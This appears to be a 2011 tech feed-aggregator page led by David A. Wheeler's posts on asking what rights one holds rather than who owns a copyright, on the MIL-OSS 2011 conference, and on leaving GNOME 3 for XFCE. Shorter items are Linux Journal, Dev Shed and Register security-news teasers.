I hope this figure makes it easier to understand the different approaches for maintaining off-the-shelf (OTS) software.

Sat 10 September, 2011

Channel Image13:13 Ask not who holds the copyrights» David A. Wheeler's Blog

Asking “who has the copyright?” for intellectual works (like software, documents, and data) is almost always the wrong question to ask. Instead, ask “what rights do I have (or can I get)?” and “do those rights let me do what I want to do?”. In a vast number of situations, those are the right questions to ask instead. Even people who should know better can fall into this subtle trap!

This became obvious to me when it was revealed that even the smart people at the Apache Software Foundation fell into this. In the recent Accumulo proposal, there were unnecessary copyright hurdles because Apache was unnecessarily asking for a copyright transfer, instead of the necessary rights (in this case, there was no copyright to transfer!).

So I’ve justed posted Ask Not Who Holds the Copyright, which I hope will clear this up.

Mon 05 September, 2011

Channel Image00:35 MIL-OSS 2011» David A. Wheeler's Blog

I recently went to the MIL-OSS (“military open source software”) 2011 Working Group (WG) / Conference in Atlanta, Georgia. Topics included the open prosthetics project, releasing government-funded software as OSS, replacing MATLAB with Python, the “Open Technology Dossier Protocol” (OTDP), confining users using SELinux, an explanation of DoD policies on OSS, Charlie Schweik’s study on what makes a success OSS project, and more. Some people started developing a walkie-talkie Android app at the conference. Here’s a summary of the conference, if you’re curious.

First, a few general comments. If this conference is any guide, it is slowly getting easier to get OSS into government (including military) systems. OSS is already used in many places, but it’s often “don’t ask, don’t tell”, and there are still lots of silly bureaucratic barriers that prevent the use of OSS where it should be used or at least considered. But there were many success stories, with slide titles like “how we succeeded”.

Although the conference had serious purposes, it was all done in good humor. All participants got the MIL-OSS poster of Uncle Sam (saying “I want YOU to Open Source!”). The theme of the conference was the WarGames movie; the first finder for each of the WarGames Easter eggs would get a silly 80s-style prize (such as an Atari T-shirt).

As the MIL-OSS 2011 presentations list shows, I gave three talks:

  • Publicly Releasing Open Source Software (OSS) Developed for the U.S. Government. This presentation explained when the government or contractors can publicly release software, as open source software, if it was developed using U.S. government funds. This presentation summarized my paper Publicly Releasing Open Source Software Developed for the U.S. Government (also see Kane McLean’s one-page summary of this paper, the “OSS Releasability Quick Reference”, which was given to every conference participant). I think this is an important topic. Billions of dollars go into developing software, yet most of the time, the taxpayers (who paid for it) don’t get the benefits. It turns out that this software often can be released; this is the decoder ring for these Byzantine rules. This can have incredible benefits. For example, the DoD funded the work that created the Internet, and then released as OSS an implementation of its key TCP/IP protocols. The Internet has mightily benefitted the DoD, in fact, it’s benefitted the whole world. (And yes, it had the required WarGames Easter egg. Slide 15 says “Talk to others who have experience with OSS” — the egg is in the supporting bullet, “Q: What is it doing? A: It’s learning!”)
  • Why the GPL Might not Destroy the Universe. This tongue-in-cheek talk tries to counter some of the silly, over-the-top fears about the GNU General Public License (GPL). I figure any presentation can’t be bad if it includes photos of Godzilla, flying saucers, zombies, and a poster saying “If you program open source, you’re programming COMMUNISM!”.
  • HOST Lessons Learned (with Tom Dunn). This summarized interviews of various people on the roadblocks to using or developing open technology (including open source software) in the government.

The conference was complicated by the recent passing of Hurricane Irene. The area itself was fine, but some people had trouble flying in. The first day’s whole schedule was delayed so speakers could arrive (using rescheduled flights). That was probably the best thing to do in the circumstance — it was basically like a temporary time zone change — but it meant that one of my talks that day (Why the GPL Might not Destroy the Universe) was at 9:10pm. And I wasn’t even the last speaker. Eeeek. Around 15 speakers had still not arrived when the conference arrived, but all but one managed to get there before they had to speak.

Here are few notes on the talks:

  • Andy Henshaw (GTRI) spoke on “Replacing MATLAB: Python Tools for Scientists and Engineers”. His basic point is that “Python is a good replacement for MATLAB in a lot of cases”. Although Python isn’t fast by itself, it’s often useful as a glue, with the intensive data-handling being done by hand-crafted libraries. He focused on (and discussed) the libraries NumPy, SciPy, matplotlib, and ipython. He also discussed differences between MATLAB and Python for MATLAB users. In Matlab, the basic type is a matrix, it uses 1-based indexing, ‘*’ means matrix multiplication, and function calls use pass-by-value with lazy copy-on-write. In contrast, in Python with libraries like these, the basic type is a multidimensional array, it uses 0-based indexing, ‘*’ means element-wise multiplication (use dot() for matrix multiplication or use the matrix class), and function calls use pass-by-reference.
  • I learned interesting things about AdaCore (who make GNAT pro, SPARK Pro, and Code Peer). They don’t have a separate support organization — their engineers provide support directly, since support is really what they sell.
  • Maj Wilson/Kane McLean discussed changing culture. They argued that the mind has two independent decision-making functions that work simultaneously: the emotional mind and the rational mind. The emotional mind is like an elephant; it’s illogical and determined, emphasizes getting stuff done, and has mental “muscle memory”. The rational mind is like a jockey; it’s logical and reasoned, emphasizes organization but often can’t “get off the saddle”, and does long-term / strategic planning. You need to convince both, so you should try to shrink the change, shape a clear path forward, and repeat what works. They believe that culture change in a big bureaucracy happens from both the top (the “clouds”) and the bottom (the “grass roots”); resistance often comes from the middle. The solution for change, then, is to “seed clouds” and “grow the grass”.
  • The “Open Technology Dossier Protocol” (OTDP) was pitched by Winston Messer and Nick Bollweg. Basically, they’d like every OSS project to put, on their web site, a small XML file that would let various search systems learn more about their project. That way, each project can update their own information.
  • David Egts (Red Hat) explained “SELinux user confinement” - a new capability in RHEL 6 to easily confine users using SELinux. Just install the “policycoreutils-python” package, which includes the semanage tool that lets you control much more precisely what specific users may do.
  • Alex S. Voultepsis explained how the intelligence community (IC) has built up an internal infrastructure with the tools that people want to use; in a vast number of cases, they use OSS to do this. For example, Intellipedia is implemented using MediaWiki, the same software that runs Wikipedia.
  • Dan Risacher discussed the DoD Oct 16, 2009 memo on open source software. He noted that we have a “Government IP knot”: “Government rules are designed to enable a program manager to control their program, not to enable sharing it”. A way to cut this knot is to make it clear that the software will be released as OSS; then everyone knows what the rules are. He wants to be a “developer advocate” - the DoD needs to be able to innovate faster than its opponents.
  • John Kuniholm presented on the “Open Prosthetics Project”. He is missing part of an arm, and explained some of the complications of making prosthetics. A key need is really good open source CAD tools. That is a general problem, not unique to the military or government — currently the tools are hideously expensive, and until that changes, the promise of cheap 3D printers will be harder to realize.
  • Charlie Schweik has been doing a lot of quantitative studies of OSS projects, to determine what separates successful projects from abandoned projects. He expects to have a book on soon on this topic! In the initiation stage, the key factors were: Leadership by doing, clear vision, and well-articulated goals. Other factors were Project marketing; project financing; knowledge continuity; being a multideveloper project. A really key factor, once a project is initiated, is gaining a developer (and then gaining more later). There are many conflicting claims, e.g., some say that smaller groups are better (Brooks), that larger groups are better (Linus’ law), or that size doesn’t matter; his data shows that Linus’ law is the correct one. Face-to-face communication doesn’t seem to be as important as it used to be, due to better communication technology. He’s gathered lots more info; I’m looking forward to seeing the whole thing.
  • One great thing was that everyone was motivated to actually solve problems, immediately. There is already an official DoD Open Source Software (OSS) Frequently-Asked Questions (FAQ), but there’s a need for a less-official FAQ, so during the conference a new MIL-OSS OSS FAQ was created. On the last day there was a discussion between various software developers and military folks, particularly about military needs. A real problem in military situations — and disasters like hurricanes — is that centralized communications systems fail. Within a short time, people were suddenly developing an OSS walkie-talkie application for Android and hosting it on github.

Many discussions revolved around the problems of getting authentication/authorization working without passwords, in particular using the ID cards now widely used by nearly all western governments (such as DoD CAC cards). Although things can work sometimes, it’s incredibly painful to get them to work on any system (OSS or not), and they are fragile. Dmitri Pal (Red Hat)’s talk “CAC and Kerberos From Vision to Reality” discussed some of the problems and ways to possibly make it better. The OpenSSH developers are actively hostile to the X.509 standard that everyone uses for identity certificates; I agree with the OpenSSH folks that X.509 is clunky, but that is what everyone uses, and not supporting X.509 means that openssh is useless for them. Every card reader is incompatible with the others, so every time a new model comes out, drivers have to be written and it often doesn’t work anyway (compare that to USB keyboards, which “just work” every time even through KVM switches). I think some group needs to be formed, maybe a “Simple Authorization without passwords” group, with the goal of setting standards and building OSS components so that systems by default (maybe by installing one package) can trivially use PKI and other systems and have it “just work” every time. No matter that client, server (relying party), or third-party authenticator/authorization server is in use.

If you’re interested in more of my personal thoughts about OSS and the U.S. Department of Defense (DoD), also see FLOSS Weekly #160, the interview of David A. Wheeler by Randal Schwartz and Simon Phipps. Good general sites for more info are the MIL-OSS website and the DoD CIO Free Open Source Software (FOSS) site.

There’s more to be done, but a lot is already happening.

Tue 30 August, 2011

Channel Image05:39 Embed a vimeo video using swfobject and setting the audio to mute» scriptygoddess
Not too much to explain here – wanted to embed a vimeo video, and wanted it to autoplay, but wanted the volume set to mute to start… <div id="myvideo"></div> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script> <script type="text/javascript"> function vimeo_player_loaded() { moogaloop3 = document.getElementById('myvideo'); moogaloop3.api_setVolume(0); } var flashvars = { 'clip_id': '29950141', 'server': 'vimeo.com', 'show_title': 0, 'show_byline': 0, 'show_portrait': [...] No related posts. Related posts brought to you by Yet Another Related Posts Plugin.

Fri 19 August, 2011

Channel Image04:43 Should Google Buy HP's PC Business?» Linux Journal - The Original Magazine of the Linux Community
HP getting out of PC hardware

So the biggest PC maker is getting ready to dump its PC business. That's the gist of HP kills tablets, confirms PC spin-off plans, in . more>>


Channel Image04:07 Introducing the “We’re In” app from Bing» Bink.nu

Today we're happy to announce the release of the "We're In" app for Windows Phone.

We’re In makes organizing get- together’s, carpooling and trying to find people in a crowd a breeze. Any time you want to see where your friends are—We're In can help you. It's simple, invite your friends, and when they join, they'll see your location and you'll see theirs. When the invite expires, so does the shared location – no complicated process to worry about.

We’re In is a great way to save time and frustration when planning your roadtrip or meeting your friend at the mall – helping you connect with your friend faster. Let’s take a closer look at the new We’re In product features and how they work.

We’ve made We’re In super simple to use – all you need is your phone number to sign up. Simply invite your friends (via your contacts) to start sharing location info with each other including who, why, and how long:

clip_image002

Pick your friends from the contact list or enter their phone number, tell them what the plan is. At this point you can choose how long you want to share location info.

Your friends receive a text message with these details. They can use the app to join you or, for friends that don't have a Windows Phone, they can join from the mobile website via the invite.

Continue At Source


Channel Image03:15 Re-enabling creation of Linked IDs» Bink.nu

Today we are beginning to re-enable the ability to create new Linked IDs. This change is rolling out in the next couple days and should be complete this week.

For some customers – particularly power users – you’ve told us that it’s essential to be able to juggle multiple accounts. Over the last year we’ve added several powerful new ways to do this – specifically aliases and email aggregation (“POP aggregation), on top of existing features like “plus addresses”. Each of these is a great solution designed to help a different scenario:

  • Aliases and plus addresses are a great way to create unique email addresses – great to manage a particular event (shopping for a car or planning wedding for example) or to manage mail from marketing sites.
  • Email aggregation is a great way to take multiple accounts from different email providers and consolidate them all in your Hotmail inbox.

As we have made these changes, we looked at how most people use Linked IDs and found that, for the most part, they were used to solve exactly these problems – managing multiple email addresses and accounts. In our major update last month, one of the things we did is turn off the ability to create new Linked IDs, instead encouraging use of our new features. However it became clear from listening to your feedback that there were many people who used Linked IDs for other reasons, and so we are making a change today to re-enable the creation of Linked IDs.

Full Story At Source


Channel Image00:39 DrupalCon London is Around the Corner» Linux Journal - The Original Magazine of the Linux Community
DrupalCon London

Many of you know what a huge Drupal fan I am, and while I am a bit heartbroken that I will not attend the upcoming DrupalCon London, happening August 22-26 in Croydon, I'd like to give the rest of you the skinny on DrupalCon so you can all go have fun without me.  To that end, I got a few tidbits from Robert Castelo, one of DrupalCon's organizers. more>>


Thu 18 August, 2011

Channel Image16:42 Creating a Centralized Syslog Server» Linux Journal - The Original Magazine of the Linux Community

A centralized syslog server was one of the first true SysAdmin tasks that I was given as a Linux Administrator way back in 1997. My boss at the time wanted to pull in log files from various appliances and have me use regexp to search them for certain key words. At the time Linux was still in its infancy, and I had just been dabbling with it in my free time. more>>


Channel Image13:41 Outsourcer says rivals faked stolen database offer» The Register - Security: Enterprise Security

'Envious competitor in lame attempt to hurt us'

eBay-style outsourcing site PeoplePerHour says a rival firm faked emails which claimed to be offering the company's customer database for sale.…

Channel Image07:54 PHP: Applying the Law of Demeter» Dev Shed - Web Developer Tutorials
In this second part of a two-part series, we will be learning how to apply the Law of Demeter in PHP.

Wed 17 August, 2011

Channel Image17:39 Readers' Choice 2011 Awards» Linux Journal - The Original Magazine of the Linux Community
Readers' Choice badge

The 17th annual Readers' Choice Awards are under way! Voting will close on Sep. 2, 2011.

Please note: You are not required to vote in every category, please simply skip over a question if you wish.

Thank you for participating!
Your friends at Linux Journal more>>


Channel Image17:17 Dog fight game bitten with pro-PETA virus» The Register - Security: Malware

Dog and bone Trojan

Supporters of the People for the Ethical Treatment of Animals (PETA) organisation may have embraced new measures in the fight for animal rights, allegedly releasing a malware-infected version of a dog-fighting app PETA wants banned.…

Channel Image17:00 Clauses and Logical Operators for Retrieving Table Data» Dev Shed - Web Developer Tutorials
In this sixth part of a nine-part series that focuses on retrieving data from tables with the SELECT statement, you'll learn how to code the WHERE clause and how to use comparison and logical operators. This article is excerpted from chapter three of the book Murach's Oracle SQL and PL/SQL, written by Joel Murach (Murach Publishing; ISBN: 9781890774509).

Tue 16 August, 2011

Channel Image22:00 Malware mints virtual currency using victim's GPU» The Register - Security: Malware

Bitcoin mining meets parallel computing

Security researchers have unearthed a piece of malware that mints a digital currency known as Bitcoins by harnessing the immense power of an infected machine's graphical processing units.…

Channel Image14:00 PHP and the Law of Demeter» Dev Shed - Web Developer Tutorials
In this PHP programming tutorial, we will be looking at the Law of Demeter and learn how to avoid violating its strict rules.

Mon 15 August, 2011

Channel Image22:05 FourthParty is here» Linux Journal - The Original Magazine of the Linux Community
FourthParty.info

Back in March of '09, I posted Get ready for fourth party services here, calling them "a classification for user-driven services" and "a place where a vast new marketplace can open up, serving customers first". more>>


Channel Image21:36 Creating Media-Savvy Journalists with Mac» Apple Hot News
At the world-famous Missouri School of Journalism, the MacBook Pro is now a universal presence in a curriculum designed to give students the hands-on experience they need to produce work at the same level as any professional journalist. Students use their Mac notebooks with iLife and Final Cut Pro to report, write, edit, and produce stories for the school’s newspaper, TV station, and online news service. Says Associate Dean Brian Brooks, “The Mac can really transform how we teach journalism in this country.”
Channel Image16:02 Java SE 7 Now Available» Dev Shed - Web Developer Tutorials
Oracle recently released Javas newest edition in the form of Java Platform, Standard Edition 7. The release is significant, as it is the platforms first under the Oracle umbrella. Oracle engineers collaborated with members of global Java ecosystem via the Java Community Process and the OpenJDK Community in creating Java SE 7, and it comes loaded with plenty of new and improved features.
Channel Image15:00 Moving Databases» Linux Journal - The Original Magazine of the Linux Community
Database

I recently moved my personal website from GoDaddy to my home server. I have a business connection at my house, and my site gets little enough traffic that hosting at home on my static IP makes sense. Moving the files wasn't really difficult, I FTP'd them down from the old server, and SFTP'd them up to the new server. Moving the database was a bit more challenging, however.
more>>


Sat 13 August, 2011

Channel Image02:15 Attack on open-source web app keeps growing» The Register - Security: Malware

8 mil poisoned pages, thanks to osCommerce users

An attack targeting sites running unpatched versions of the osCommerce web application kept growing virally this week, more than three weeks after a security firm warned it was being used to install malware on the computers of unsuspecting users.…

Fri 12 August, 2011

Channel Image16:30 Reasons Why Windows Phone 7 Could Become the Smartphone King» Dev Shed - Web Developer Tutorials
Windows Phone 7 is not Microsofts first foray into the mobile operating system arena. The software giant kicked its mobile OS history off in the 1990s with the introduction of Windows CE for phones and PDAs. CE never achieved meteoric success, but it did manage to find a niche in the enterprise world.
Channel Image15:00 What Color is Your Car?» Linux Journal - The Original Magazine of the Linux Community
Green Snot

Geeks like their soda Mountain Dewey, their coffee strong, and their source open. But what I'm REALLY curious about is what color car we drive. You know, for science. :)

Please select the color of your car. If you have two different color cars, or a car that is multi-colored -- pick a color you feel speaks to your inner geekness the most.  (If your color isn't listed, pick the closest. THERE IS NO "OTHER")

UPDATE: I added an option for those without cars. Because I give and give and give. ;o)


Channel Image14:39 Gary McKinnon support website defaced» The Register - Security: Enterprise Security

Serial graffiti splasher TurkGuvenligi strikes again

A support blog for alleged Pentagon hacker Gary McKinnon had its domain name hijacked on Friday morning.…

Channel Image11:39 MySpace site glitch mistaken for hack attack» The Register - Security: Enterprise Security

OMG! Must've been Anonymous. LOL

An error message on once dominant but now almost defunct social networking site MySpace early on Friday has been confused with a hack.…

Free Whitepaper: Implementing Energy Efficient Data Centers

Channel Image11:17 Android respawn horror: Hacker says hackers' phones hacked» The Register - Security: Enterprise Security

Defcon visitors see handsets being scoped

Claims that both CDMA and 4G networks were compromised at the recent Defcon security event in Las Vegas have raised little surprise, but the vulnerability of handsets is hotly debated.…

Channel Image10:59 Traumatic scenes for car geeks as forum falls over» The Register - Security: Enterprise Security

Man made cake, spoke to wife

There were fears of further outbreaks of violence on the streets yesterday when the UK's busiest motoring forum site, PistonHeads.com, disappeared offline.…

Thu 11 August, 2011

Channel Image21:57 Smartphone images can hijack BlackBerry servers» The Register - Security: Enterprise Security

RIM squashes high-severity bug

Research in Motion has squashed a nasty bug in its BlackBerry server software that allowed it to be commandeered when handset users received messages containing booby-trapped images.…

Channel Image17:52 Pint-Size PPA Primer» Linux Journal - The Original Magazine of the Linux Community

Package management in Linux is great, but unfortunately, it comes with a few cons. Granted, most distributions keep all your software, not just system software like Apple and Microsoft, updated. The downside is that software packages aren't always the latest versions. Whatever is in the repository is what you get. more>>


Channel Image17:28 PHP: Addings Images to Wordpress PDFs» Dev Shed - Web Developer Tutorials
In this programming tutorial, you will be learning how to use PHP and the R OS PDF class to convert Wordpress posts to pdf's without losing article images in the process.
Channel Image14:48 Anonymous and TeaMp0isoN promise songs but no Facebook hack» The Register - Security: Enterprise Security

Factions forming within hack group

Politically motivated hacking crew TeaMp0isoN has teamed up with Anonymous in an attempt to storm the music charts.…

Channel Image12:45 Love lure malware turns up at Android marketplace» The Register - Security: Malware

History repeating

Android Trojan writers are trying more tricks to fool the unwary into downloading rogue applications with a new set of rogue applications.…

Free Whitepaper: Implementing Energy Efficient Data Centers

Wed 10 August, 2011

Channel Image18:03 Trojan script gets stuck on superglue site» The Register - Security: Enterprise Security

Sticky situation for malware

The website of Super Glue became bunged up with a malicious script earlier this week as part of a tricky problem that was only resolved on Wednesday.…

Free Whitepaper: Implementing Energy Efficient Data Centers

Channel Image17:37 Printing in Scribus» Linux Journal - The Original Magazine of the Linux Community

Scribus is designed for quality printing. Unlike a word processor, its output is not meant simply to be good enough for practical use, but to be fine-tuned until it is as close as possible to what you want. For this reason, printing is considerably more complicated in Scribus than in the office applications with which you may be familiar. more>>


Channel Image17:31 Chinese government under cyber siege» The Register - Security: Malware

'We're the victims not the perps'

The Chinese government claims it came under almost 500,000 cyberattacks last year, most of which it said originated outside the country.…

Channel Image17:00 Install and Optimize PlayOnLinux on Ubuntu and Wine» Dev Shed - Web Developer Tutorials
If you find it necessary to run Windows programs or applications in Ubuntu, you should take a closer look at PlayOnLinux. This program is powered by Wine to run Windows programs on Ubuntu, even if those applications are designed to optimally run on different Wine versions or settings.
Channel Image13:57 Watchdog washes hands of Lush hack» The Register - Security: Enterprise Security

Soft soap for hippy soap seller

The Information Commissioner's Office is facing criticism today for its failure to punish online retailer Lush for losing 5,000 customer debit and credit card details…

Channel Image13:48 Security watchers question supposed Facebook hack» The Register - Security: Enterprise Security

Claims of new hacktivist target look like a hoax

Reported plans by Anonymous to attack Facebook on 5 November appear to be an elaborate hoax by an unknown source.…

Channel Image11:53 Rootkit gangs fight for control of infected PCs» The Register - Security: Malware

Malware that seeks and destroys other malware

A turf war is developing between rootkit-touting cybercrooks over control of infected PCs.…

Tue 09 August, 2011

Channel Image22:17 IE, Windows server bugs likely to be exploited soon» The Register - Security: Malware

Yes, it's Microsoft Patch Tuesday again

Microsoft has released 13 updates that patch security holes in a wide range of its software offerings, including vulnerabilities rated critical in its Internet Explorer browser and Windows server operating systems.…

Channel Image19:55 Super Collision At Studio Dave: The New World Of SuperCollider3, Part 2» Linux Journal - The Original Magazine of the Linux Community
sc3_graph.png

In the first part of this series I introduced SuperCollider3 and its most basic operations. Now let's make things a little more interesting by adding a little randomization, a neat GUI, and some MIDI control.

Creating A GUI more>>


Channel Image17:41 BlackBerry blog hacked with riot-related threats» The Register - Security: Enterprise Security

We know where you live, says hacking crew

RIM's corporate blog has been defaced with threats as part of a protest against the BlackBerry maker's plans to hand over information on London rioters to the police.…

Channel Image16:30 Limiting Rows When Retrieving Table Data» Dev Shed - Web Developer Tutorials
In this fifth part of a nine-part article series on retrieving data from Oracle databases with the SELECt statement, you'll learn how to use the DISTINCT keyword and ROWNUM pseudo column to limit the number of rows returned. This article is excerpted from chapter three of the book Murach's Oracle SQL and PL/SQL, written by Joel Murach (Murach Publishing; ISBN: 9781890774509).
Channel Image12:06 Fake Firefox update bundles Trojan add-on» The Register - Security: Malware

Spam emails try basic ruse in attempt to fool the clueless

Scammers are attempting to trick Firefox users into downloading backdoored software via spam emails that supposedly advertise an "update" to the open-source browser.…

Mon 08 August, 2011

Channel Image16:52 Gordon Ramsay sues father-in-law over alleged spyware plot» The Register - Security: Malware

Cooking up trouble

Sweary celebrity chef Gordon Ramsay is suing members of his wife's family, alleging they used malware to gain illicit access to his business and personal email accounts.…

Free Whitepaper: Implementing Energy Efficient Data Centers

Channel Image15:00 Linux Distro: Tails - You Can Never Be Too Paranoid» Linux Journal - The Original Magazine of the Linux Community

Tails is a live media Linux distro designed boot into a highly secure desktop environment. You may remember that we looked at a US government distro with similar aims a few months ago, but Tails is different because it is aimed at the privacy conscious “normal user” rather than government workers. more>>


Channel Image13:56 10-year old hacker finds flaw in mobile games» The Register - Security: Enterprise Security

Feeling old?

A 10-year-old hacker has won the admiration of her adult peers for finding a previously unknown vulnerability in games on iOS and Android devices.…

Channel Image08:38 Android and iPhone Post Strong Second Quarter Numbers» Dev Shed - Web Developer Tutorials
Canalys, a research firm that focuses on smartphone analysis and more, recently released its final global smartphone market estimates for the second quarter of 2011. While the numbers show a strong quarter for the market as a whole, Android and Apple had particularly strong showings.
Channel Image07:02 Beware of Macs in enterprise, security consultants say» The Register - Security: Enterprise Security

OS X in the age of espionage malware

Black Hat Apple may have built its most secure Mac operating system yet, but a prominent security consultancy is advising enterprise clients to steer clear of adopting large numbers of the machines.…

Free Whitepaper: Implementing Energy Efficient Data Centers

Fri 05 August, 2011

Channel Image17:47 Recycle's Friend, Reuse» Linux Journal - The Original Magazine of the Linux Community
circuitboard clock

Recycling is something we all deal with, or at least should deal with, when it comes to technology. more>>


Channel Image17:04 Cisco warns over warranty discs of EVIL» The Register - Security: Malware

Malicious suppository Easter Egg shenanigans

Networking giant Cisco has warned customers that a CD-ROM it supplied with its kit automatically took users to a site that was a known malware repository.…

Channel Image10:42 Microsoft preps 13 updates for August Patch Tuesday» The Register - Security: Enterprise Security

Unloads baker's dozen after quiet July

Microsoft is fuelling up 13 bulletins for release next week, including an update that guards against critical flaws in Internet Explorer.…

Thu 04 August, 2011

Channel Image22:23 Exploit writer spills beans on secret iPhone function» The Register - Security: Malware

iOS debugger of no use to anyone ... except hackers

Black Hat Independent security consultant Stefan Esser made waves earlier this year when a technique he developed for hacking iPhones was adopted by JailbreakMe and other mainstream jailbreaking services.…

Channel Image16:08 Cybercrooks exploit interest in Harry Potter ebook site» The Register - Security: Malware

Muggles mugged

Malware-slingers are tapping into the buzz around a new Harry Potter site to mount a variety of scams designed to either defraud, infect or otherwise con would-be victims.…

Channel Image13:17 Anonymous unsheathes new, potent attack weapon» The Register - Security: Enterprise Security

Better DDoS attacks ahead

Members of Anonymous are developing a new attack tool as an alternative to the LOIC (Low Orbit Ion Cannon) DDoS utility.…

Channel Image10:48 Mobile app malware menace grows» The Register - Security: Malware

Android users at front line of attack

The number of apps on mobile marketplaces contaminated with malware grew from 80 to 400 during the first half of 2011, according to a study by Lookout Mobile Security.…

Channel Image06:30 MySQL Left and Right Joins» Dev Shed - Web Developer Tutorials
In this MySQL database tutorial, you will learn how to perform LEFT and RIGHT joins using a sample database and some hands-on examples.
Channel Image02:01 Ultra stealthy spy malware not so stealthy after all» The Register - Security: Enterprise Security

APT and the tell-tale error message

A researcher has discovered a flaw in software used to spy on government agencies and contractors that can alert security personnel that their networks have been infiltrated by the otherwise hard-to-detect programs.…

Wed 03 August, 2011

Channel Image20:45 Researchers poke gaping holes in Google Chrome OS» The Register - Security: Enterprise Security

Chromebook only as safe as its weakest apps

Black Hat Google has billed its Chrome operating system as a security breakthrough that's largely immune to the threats that have plagued traditional computers for decades. With almost nothing stored on its hard drive and no native applications, there's no sensitive data that can pilfered and it can't be commandeered when attackers exploit common software vulnerabilities.…

Channel Image20:31 GNOME 3 Shell is terrible, I am switching to XFCE» David A. Wheeler's Blog

I’m a long-time user of Fedora and GNOME. GNOME 2 has served me well over the years, so I was interested in what the GNOME people were cooking for GNOME 3. Fedora 15 comes with the new GNOME 3 shell; since change can sometimes be good, I’ve tried to give the new GNOME 3 shell a fair trial.

But after giving GNOME 3 (especially GNOME shell) some time, I’ve decided that I hate the GNOME 3 shell as it’s currently implemented. It’s not just me; the list of people who have complaints about the GNOME 3 shell include Linus Torvalds, Dedoimedo (see also here), k3rnel.net (Juan “Nushio” Rodriguez), Martin Sourada, junger95, and others. LWN noted the problems of GNOME 3 shell way back. So many people are leaving GNOME 3, often moving to XFCE, that one person posted a poem titled “GNOME 3, Unity, and XFCE: The Mass Exodus”.

The GNOME 3 shell is beautiful. No doubt. But as far as I can tell, the developers concentrated on making it beautiful, cool and different, but as a consequence made it far less useful and efficient for people. Dedoimedo summarizes GNOME 3.0 shell as, “While it’s a very pretty and comely interface, it struck me as counterproductive, designed with a change for the sake of change.” In a different post Dedoimedo says, “Gnome 3 is a toy. A beautiful, aesthetic toy. But it is not a productivity item… I am not a child. My computer is not a toy. It’s a serious tool… Don’t mistake conservative for inefficient. I just want my efficiency.”.

Some developers have tried to fix its worst problems of GNOME 3 shell with extensions, and if GNOME developers work at it, I think they could change it into something useful. But most of these problems aren’t just maturity issues; GNOME 3 shell is broken by design. So I’m going to switch to XFCE so I can get work done, and perhaps try it again later if they’ve started to fix it. Thankfully, Fedora 15 makes it easy to switch to another desktop like XFCE, so I can keep on happily using Fedora.

So what’s wrong?

I’ve been trying to figure out why I hate GNOME 3 so much, and it comes down to two issues: (1) GNOME 3’s shell makes it much harder to do simple, common tasks, and (2) GNOME 3 shell often hides how to do tasks (it’s not “discoverable”). These are not just my opinions, lots of people say these kinds of things. k3rnel.net says, “Gnome’s ‘Simplicity’ is down right insulting to a computer enthusiast. It makes it impossible to do simple tasks that used to flow naturally, and it’s made dozens of bizarre ‘design decisions’, like hiding Power Off behind the ‘Alt’ key.” Let me give you examples of each of these issues.

First of all, GNOME 3 (particularly its default GNOME shell) creates a lot of extra steps and work to do simple tasks that used to be simpler. To run a program whose name you don’t know, you have go to the far top left to the hot spot (or press “LOGO”), move your mouse to the hideously hard-to-place (and not obvious) “Applications” word slightly down the right, then mouse to the far right to choose a category, then mouse back to choose it. That’s absurd; the corners of the screen are especially easy to get to, and they fail to use that fact when choosing non-favorite applications. Remarkably, there doesn’t seem to be a quick way to simply show the list of (organized) applications you can start; there’s not even a keyboard shortcut for “LOGO Applications”. Eek. This is a basic item; even Windows 95 was easier. Would it really have killed anyone to make moving to some other area (say, the bottom left corner) show the applications? And why are the categories on the far right, where they are least easy to get to and not where any other system puts them? (Yes, the favorites area lets you start some programs, but you have to find it the first time, and some of us use many programs.) Also, you can’t quickly alt-tab between arbitrary windows (Alt-tab only moves between apps, and the undiscoverable alt-` only moves between windows of the same app). GNOME shell makes it easy to do instant messaging, but it makes it harder to do everything else. Fail.

GNOME 3’s capabilities are not discoverable, either. To log off or change system settings you click on your name — and that’s already non-obvious. But it gets worse. To power off, you click on your name, then press the ALT key to display the power off option, then select it. How the heck would a normal user find out about this? The only obvious way to power down the system is to log out, then power off from the front. If you know an application name, pressing LOGO (aka WINDOWS) and typing its name is actually a nice feature, but that is not discoverable either. If you want a new process or window (like a new terminal window or file manager window), you have to know press control when you select its icon to start a new process (for Terminal, you can also start it and press shift+control+N, but that is not true for all programs). The need to press control isn’t discoverable (it’s also a terrible default; if I press a program icon, I want a new one; if I wanted an existing one I’d select its window instead). Fail.

There are some nice things about GNOME 3 shell. As I mentioned earlier, I like the ability to press LOGO start typing a program name (which you can then select) - that is nice. But even then, this is not discoverable; how would a user new to the interface know that they should press the LOGO button? This functionality is trivial to get in other desktop environments; I configured XFCE to provide the same functionality in less than a minute (in a way that is less pretty, but much easier for a human to use).

The implementors seem to think that new is automatically better. Rediculous. I don’t use computers to have the newest fad interface, I use them to get things done (and for the pleasure of using them). I will accept changes, but they should be obvious improvements. Every change just for its own sake imposes relearning costs, especially for people like me who use many different computers and interfaces, and especially if they make common operations harder. Non-discoverability is especially nasty; people don’t want to read manuals for basic GUI interfaces, they want to get things done.

I don’t think GNOME 3 is mature, either. For example, as of 2011-07-28, GNOME 3 does not support screensavers — it just shows a blank screen after a timeout. But the previous GNOME 2 had screensavers. Heck, Windows 3.0 (of 1993) did better than that; it had screensavers, and I’m sure there were screensavers before then.

I’ve tried to get used to it, because I wanted to give new ideas a chance. Different can be better! But so far, I’m not impressed. The code may be cleaner, and it may be pretty, but the user experience is currently lousy.

If you’re stuck using the GNOME 3 Shell, you basically must read the GNOME shell cheat sheet, because so much of what it does is un-intuitive, incompatible with everything else, and non-discoverable. Needing to read a manual to use a modern user interface is not a good sign.

You could try switching to the GNOME 3 fallback mode, as discussed by Dedoimedo and others. This turns on a more tradtional interface. Several people have declared that GNOME 3 fallback is better than GNOME shell itself. But I was not pleased; it’s not really well-supported, and it’s really not clear that this will be supported long term.

You can also try various tweaks, configurations, and additional packages to make GNOME 3 shell more tolerable. If you’re stuck with GNOME 3 shell, install and use gnome-tweak-tool; that helps. You should also install the Fedora gnome-shell-extensions-alternative-status-menu package, which lets you see “Power off” as an option.

But after trying all that, I decided that it’d be better to switch to another more productive and mature desktop environment. Obvious options are XFCE and KDE.

XFCE is a lightweight desktop environment, and is what I’ve chosen to use instead of the default GNOME 3 shell. I found out later that other people have switched to XFCE after trying and hating GNOME 3’s shell. XFCE doesn’t look as nice as GNOME 3, indeed, the GNOME 3 shell is really quite flashy by comparison. But the GNOME shell makes it hard for me to get anything done, and that’s more important.

